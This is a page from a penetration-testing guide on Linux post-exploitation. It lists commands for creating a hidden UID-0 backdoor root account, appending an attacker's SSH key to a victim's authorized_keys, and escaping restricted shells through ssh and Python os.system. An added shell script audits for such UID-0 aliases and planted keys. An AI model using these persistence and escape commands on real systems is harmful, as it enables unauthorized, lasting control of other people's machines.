The Pentesting Guide

Linux

Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.

User

Creating a user

# -m also creates the home directory for the new account
sudo useradd [-m] <USERNAME>

Add a user to a group

# -a appends to the user's supplementary groups instead of replacing them
sudo usermod -aG <GROUP> <USERNAME>

Create an alternative root user

# -o permits the duplicate UID 0; -p takes an already-hashed (crypt(3)) password, not plaintext
useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>

Login through SSH

There are times when we have a remote terminal as a user and want to reach that user's account over SSH as well, even though we do not know their password. SSH keys are used in these cases.

  1. Generate an SSH key pair.

kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]

  2. Add the public key to the victim's file ~/.ssh/authorized_keys:

echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys

  3. Log in.

ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
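Both the alternative root user and the appended SSH key leave a host-side footprint: a second UID-0 entry in /etc/passwd and a new line in authorized_keys. The audit helper below is an added example, not part of the guide, and runs over constructed sample data standing in for those two files (the account name backup2 and the key blobs are placeholders); point the functions at the real files to audit a host.

```shell
#!/bin/sh
# Added audit helper, not from The Pentesting Guide: lists the two artefacts the
# commands above leave behind (a second UID-0 account, an appended SSH key).
# The samples below are constructed; feed the real files to the functions instead.

# Constructed /etc/passwd sample; 'backup2' is a hypothetical UID-0 alias of root.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:x:0:0::/home/backup2:/bin/bash'

# Constructed authorized_keys sample (placeholder blobs, not real keys): a normal
# entry with a comment, a blank line, and a bare key as 'echo >>' typically leaves.
SAMPLE_AUTH_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYDATA alice@laptop

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABPLACEHOLDER'

# Print every account whose UID (field 3) is 0 but whose name is not root.
# Usage: find_uid0_aliases < /etc/passwd
find_uid0_aliases() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Print key entries that carry no trailing comment field, as "<type> <blob prefix>".
# Blank and comment lines are skipped, and so are option-prefixed entries
# (command="..." etc.), which this simple check does not parse.
# Usage: find_uncommented_keys < /home/<user>/.ssh/authorized_keys
find_uncommented_keys() {
    awk '/^[ \t]*(#|$)/ { next }
         $1 !~ /^(ssh-|ecdsa-|sk-)/ { next }
         NF < 3 { print $1, substr($2, 1, 12) }'
}

# Stand-alone run over the constructed samples.
echo "UID-0 aliases:"
printf '%s\n' "$SAMPLE_PASSWD" | find_uid0_aliases
echo "Keys without a comment field:"
printf '%s\n' "$SAMPLE_AUTH_KEYS" | find_uncommented_keys
```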

Shell Escapes

It could be the case that you have obtained access to a restricted shell that lets you run only a minimal set of commands and prevents you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

SSH

ssh <USERNAME>@<TARGET_IP> -t "bash --noprofile -i"

Python Jail

# Run inside the restricted Python interpreter (assumes the os module can be imported)
import os; os.system('/bin/bash')

For more examples of how to escape restricted shells, read the following articles.

  • rbash escape | rbash restricted shell escape
  • Escaping Restricted Linux Shells
  • Escaping python jails

Last updated 2 years ago